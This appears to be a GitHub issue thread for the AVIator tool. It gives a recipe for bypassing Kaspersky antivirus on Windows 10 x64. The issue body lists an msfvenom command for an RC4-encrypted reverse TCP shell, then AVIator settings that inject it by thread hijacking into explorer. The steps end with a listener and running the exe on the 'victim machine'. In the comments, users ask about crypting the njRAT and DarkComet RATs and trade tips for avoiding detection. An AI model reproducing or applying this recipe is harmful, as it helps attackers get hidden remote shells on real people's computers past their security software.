Kaspersky AV bypass Test Case #5
Comments
|
Thanks for your efforts it working well Do you have any tool like Aviator but for encrypt exe payload like meterpreter also for encrypting malware servers like njrat and darckcommet Thanks a lot |
not yet , but this is something that for sure I am going to implement in the very near feature |
|
my Dear also when i test x64/shell it working there's a reverse connection but no meterpreter channel opened |
|
Once you use meterpreter,the antivirus will detect it.However,shell won't. |
|
i use x/64 shell and it worked but no channel open although there's a reverse connection? |
|
Make sure you are selecting the right architecture for your shell code and for your target OS. As pple7000 said when u use meterpreter the Av propably will detect it and drop the connection as suspicious, if you use a simple shell payload the bypass works fine.... Just press few enters after the connection is open ;) |
Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)
Getting a shell in a windows 10 machine running fully updated kaspersky AV
Target Machine: Windows 10 x64
Create the payload using msfvenom
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
Use AVIator with the following settings
Target OS architecture: x64
Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)
Target procedure: explorer (leave the default)
Set the listener on the attacker machine
Run the generated exe on the victim machine
The text was updated successfully, but these errors were encountered: